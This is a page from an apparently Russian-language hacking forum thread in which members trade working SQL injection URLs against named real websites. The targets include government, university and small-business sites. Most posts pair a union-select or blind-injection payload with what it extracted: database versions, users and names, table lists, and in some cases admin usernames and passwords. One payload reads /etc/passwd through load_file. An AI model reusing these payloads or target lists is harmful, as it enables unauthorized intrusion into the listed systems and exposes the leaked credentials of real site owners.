SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
Page 522 of 798
  1. Noizless

    Noizless Member

    Joined:
    26 Jul 2009
    Messages:
    6
    Likes Received:
    8
    Reputations:
    0
    Code:
    http://www.tltinfo.ru/index.php?id=-12135+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12/*
    Database Version: 4.0.20-log
    Database name: info
    User name: webuser@localhost
    Code:
    http://www.fcneman.com/index.php?id=photos&detail=60&album=-1+union+select+concat_ws(0x3a,version(),database(),user())--
    Database Version: 5.0.81-community
    Database name: fcneman_typo3
    User name: fcneman_typo3@localhost
     
    #10421 Noizless, 22 Aug 2009
    Last edited: 22 Aug 2009
  2. W@r.N0i$e

    [email protected]$e Member

    Joined:
    2 Jun 2009
    Messages:
    54
    Likes Received:
    51
    Reputations:
    12
    http://www.hardw.com.ua/reviews.php?id=-1+un ion+select+1,concat_ws(0 x3a,ver sion(),database(),user(),@ @versi on_compile_os)/*

    Database Version: 5.0.45-community
    Database name: hardw_hardw1
    User name: hardw_keith@localhost
    OS: unknown-linux-gnu
    Из hardw_hardw1:
    Code:
    debates
news
phorum2_forum_group_xref
phorum2_forums
phorum2_groups
phorum2_messages
phorum2_settings
phorum2_subscribers
phorum2_user_group_xref
phorum2_user_newflags
phorum2_user_permissions
phorum2_users
reviews
sources
    P.S. Проверял в гугле на антибоян. Гугл ничего не нашел.
     
    #10422 [email protected]$e, 22 Aug 2009
    Last edited: 22 Aug 2009
    1 person likes this.
  3. S00pY

    S00pY Active Member

    Joined:
    24 Apr 2007
    Messages:
    91
    Likes Received:
    109
    Reputations:
    21
    кал : э (

    /*+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*/
    be-mine.ru/article.php?id=6+and+substring(@@version,1,1)=5--+
    version():5
    /*+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*/
    intimdelo.ru/index.php?id=-18+union+select+1,2,3,version(),5--+
    version():4.1.22-standard-log
    /*+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*/
    uaescort.com/ads/index.php?ct=girls&md=details&id=3950+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34--+
    Вроде блайнд....
    Version():4
    /*+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*/
    radioshanson.ru/cgi-bin/ph_guests.pl?a=ph&id=512+and+substring(@@version,1,1)=3--+
    version():3
    жаль....
    /*+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*/
     
    #10423 S00pY, 22 Aug 2009
    2 people like this.
  4. edge911

    edge911 Active Member

    Joined:
    21 Feb 2009
    Messages:
    105
    Likes Received:
    142
    Reputations:
    15
    version: 4.1.22-log
    database: inksystem
    user: inksystem@alpha
    version_compile_os: portbld-freebsd5.5

    на антибоян проверял в гугл , вроде нет...
     
    #10424 edge911, 22 Aug 2009
    2 people like this.
  5. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    http://www.vvu.edu.gh/academics/departments/nursing/facultymember.php?id=-76+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11--

    vvu0002@localhost:vvu0002_valleyview:5.0.51a-community

    PR: 7

    http://www.parliament.gov.tt/committee_business.php?mid=17&id=76&sid=13+and+substring(version(),1,1)=4


    http://www.nusicbg.org/display/zaposleni/zaposleniDetalj.php?id=-76'+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11,12,13+/*+&tt=ne

    dbnusicbg@localhost:nusicbg:5.0.26


    http://www.np.co.tt/article.php?id=-76+union+select+concat_ws(0x3a,user(),database(),version())--

    NP News - [email protected]:npweb_com_np:5.0.83
     
    _________________________
    #10425 HAXTA4OK, 22 Aug 2009
    Last edited: 22 Aug 2009
    2 people like this.
  6. Swift

    Swift Banned

    Joined:
    27 Oct 2008
    Messages:
    78
    Likes Received:
    156
    Reputations:
    8
    [email protected]


    4.0.22161648db@localhost161648db


    5.0.81-community kuwaitle_mich@localhost kuwaitle_GenralDB
     
    #10426 Swift, 22 Aug 2009
    Last edited: 22 Aug 2009
    1 person likes this.
  7. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    http://www.ausit.org/eng/search.php?type=t&id=651+and+substring(version(),1,1)=4--




    PR: 4
    (Одна большая ошибка)
    http://www.chelindustry.ru/left_prom2.php?rr=7&idotr=7&tt=7&id_raz=-40+union+select+1,2,concat_Ws(0x3a,user(),database(),version()),4,5,6,7--

    helg@localhost:helg:4.1.25-log
     
    _________________________
    #10427 HAXTA4OK, 23 Aug 2009
    Last edited: 23 Aug 2009
    1 person likes this.
  8. DrAssault

    DrAssault Member

    Joined:
    14 Nov 2008
    Messages:
    149
    Likes Received:
    89
    Reputations:
    8
    Code:
    http://www.edl.co.nz/shop.php?action=list&id=-16+union+select+1,2,3,concat(user_name,0x3a3a3a,password),5,6,7,8,9,10+from+users--
    Code:
    http://www.autom.com.ua/index.php?lang_id=1&menu_id=391&content_id=239&qu_id=-4+union+select+concat_ws(0x3a,adminuser,adminpass)+from+wmp_admin--&cat_id=3
    ==============
     
    #10428 DrAssault, 23 Aug 2009
    Last edited by a moderator: 23 Aug 2009
    1 person likes this.
  9. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    http://www.max-mtk.ru/index.php?p=1&type=3&dest=93+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a,user(),database(),version())--

    maxmtkr6_maxima@localhost:maxmtkr6_maxima:4.0.27-log
     
    _________________________
    #10429 HAXTA4OK, 23 Aug 2009
    2 people like this.
  10. DrAssault

    DrAssault Member

    Joined:
    14 Nov 2008
    Messages:
    149
    Likes Received:
    89
    Reputations:
    8
    Code:
    http://domcigar.ru/acess.php?id=-233+union+select+1,2,3,4,5,6,7,8,version(),10,11,12,13--
    5.0.67-log

    Code:
    http://domcigar.ru/acess.php?id=-233+union+select+1,2,3,4,5,6,7,8,group_concat(table_name+separator+0x0a),10,11,12,13+from+information_schema.columns--
     
    #10430 DrAssault, 23 Aug 2009
    1 person likes this.
  11. Swift

    Swift Banned

    Joined:
    27 Oct 2008
    Messages:
    78
    Likes Received:
    156
    Reputations:
    8
    http://www.mautner.at/?task=content&id=74+union+select+1,concat(0x2a,version(),user(),database())

    5.0.51b-logdb208388_12@local3db208388_12

    (PS:xss тож есть правда пассивка)
     
    #10431 Swift, 23 Aug 2009
    1 person likes this.
  12. Hack_ERR++

    Hack_ERR++ Member

    Joined:
    13 Aug 2009
    Messages:
    41
    Likes Received:
    9
    Reputations:
    0
    Code:
    http://www.ihma.in/chapter%20news.php?ID=-20+union+select+version(),2--
    5.0.81-community

    Code:
    http://www.laxpower.com/laxnews/news.php?story=-15877+union+select+1,2,3,4,5,6,7,8,9,10,11,version(),13,14,15,16,17,18,19,20,21,22,23,24--
    4.1.22-log
     
    #10432 Hack_ERR++, 23 Aug 2009
  13. Skofield

    Skofield Elder - Старейшина

    Joined:
    27 Aug 2008
    Messages:
    960
    Likes Received:
    390
    Reputations:
    58
    http://www.sfmslaw.com/pages/cases.php?id=-234+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,unhex(hex(load_file(0x2f6574632f706173737764))),6,7,8,9,0,1,2,3,4,5,6,47+from+mysql.user/*

    Database Version: 4.1.11
    Database name: class_action_database
    User name: apshel@localhost
     
    #10433 Skofield, 23 Aug 2009
    3 people like this.
  14. mr.gr33n

    mr.gr33n Banned

    Joined:
    6 Jul 2009
    Messages:
    47
    Likes Received:
    68
    Reputations:
    6
    http://www.fisharewet.org/articles.php?id=-16+union+select+1,concat_ws(0x3a,user(),version()),3,4,5--

    User: [email protected]:
    Version: 4.1.25-Debian_mt1
     
    #10434 mr.gr33n, 23 Aug 2009
    1 person likes this.
  15. DrAssault

    DrAssault Member

    Joined:
    14 Nov 2008
    Messages:
    149
    Likes Received:
    89
    Reputations:
    8
    Code:
    http://www.summervillehomes.org/communities.php?id=-8+union+select+1,version(),user()--
    4.1.22-standard-log, summervi_svh@localhost

    Code:
    http://vritikaherbotech.com/basket.php?id=-2+union+select+1,version(),3,4,5,6,7,8,9,10--
    5.0.77-community

    Code:
    http://vritikaherbotech.com/basket.php?id=-2+union+select+1,group_concat(concat(table_name,0x2f2f2f,table_schema)+separator+0x0a),3,4,5,6,7,8,9,10+from+information_schema.columns--
     
    #10435 DrAssault, 23 Aug 2009
    1 person likes this.
  16. dr.Pilulkin

    dr.Pilulkin Elder - Старейшина

    Joined:
    3 Jun 2007
    Messages:
    42
    Likes Received:
    16
    Reputations:
    0
    http://www.shooflypublishing.co.uk/product.php?id=-13+union+select+1,2,3,4,concat_ws(0x3a,user(),version(),database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--
    shoofly_@localhost:4.1.22-standard:shoofly_shoofly

    http://www.altereglow.co.uk/docs.php?doc_id=-19+union+select+1,concat_ws(0x3a,user(),version(),database()),3--
    web78-a-cubec-57@localhost:5.0.82-community:web78-a-cubec-57

    http://www.onthetable.co.uk/product.php?product=Freud_Tea_Pot&sproductID=11+limit+0+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8--
    [email protected]:5.0.45:db50847

    http://www.smartmeter.co.uk/product.php?prod_id=-5+union+select+1,2,3,4,5,6,7--
    web17_smartbase@localhost:5.0.82-community:web17_smartbase

    http://www.phillipsandevans.co.uk/product.php?product=-2858+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--
    web33-pae@localhost:5.0.82-community:web33-pae
     
    #10436 dr.Pilulkin, 23 Aug 2009
    1 person likes this.
  17. mr.gr33n

    mr.gr33n Banned

    Joined:
    6 Jul 2009
    Messages:
    47
    Likes Received:
    68
    Reputations:
    6
    http://www.epscor.dbi.udel.edu/outreach/science/article.php?id=-1+union+select+concat_ws(0x3a,user(),version()),2,3--

    PR: 5

    user: epscor-dev@localhost
    version: 5.0.60

    ---
     
    #10437 mr.gr33n, 24 Aug 2009
    Last edited: 24 Aug 2009
    1 person likes this.
  18. Hack_ERR++

    Hack_ERR++ Member

    Joined:
    13 Aug 2009
    Messages:
    41
    Likes Received:
    9
    Reputations:
    0
    Code:
    http://www.mmenterprises.co.in/news.php?nid=4+and+substring(version(),1,1)=5
    Code:
    http://www.aurensa.es/news.php?lang=ENG&year=-2007+union+select+1,2,3,4,5,6,7,8--
    5.0.51a-3ubuntu5.4
    Code:
    http://www.anforaformacion.es/news/php/v_oldboletin.php?codigo=-16+union+select+version(),2,3,4--
    5.0.32-Debian_7etch10-log
    Code:
    http://www.coecidriga.lv/news.php?lang=lv&cid=9&tid=-79+union+select+1,2,3,4,5,6,unhex(hex(version())),8,9,10,11,12--
    4.1.15-Debian_1ubuntu5-log
     
    #10438 Hack_ERR++, 24 Aug 2009
    Last edited by a moderator: 24 Aug 2009
    2 people like this.
  19. ILYAtirtir

    ILYAtirtir Elder - Старейшина

    Joined:
    25 Apr 2007
    Messages:
    142
    Likes Received:
    246
    Reputations:
    73
    Торгово-промышленная палата Российской Федерации.
    Code:
    Microsoft SQL Server 2005 - 9.00.1406.00 (Intel X86) Mar 3 2007 18:40:02 Copyright (c) 1988-2005 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
     
    #10439 ILYAtirtir, 24 Aug 2009
    1 person likes this.
  20. DrAssault

    DrAssault Member

    Joined:
    14 Nov 2008
    Messages:
    149
    Likes Received:
    89
    Reputations:
    8
    Code:
    http://www.atlantix.ie/payroll.php?id=-1+union+select+1,concat(username,0x2f2f2f2f,password),3,4+from+administration--&language=russian
    atlantix////KARMI123
     
    #10440 DrAssault, 24 Aug 2009
    1 person likes this.
(You must log in or sign up to post here.)
Page 522 of 798
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.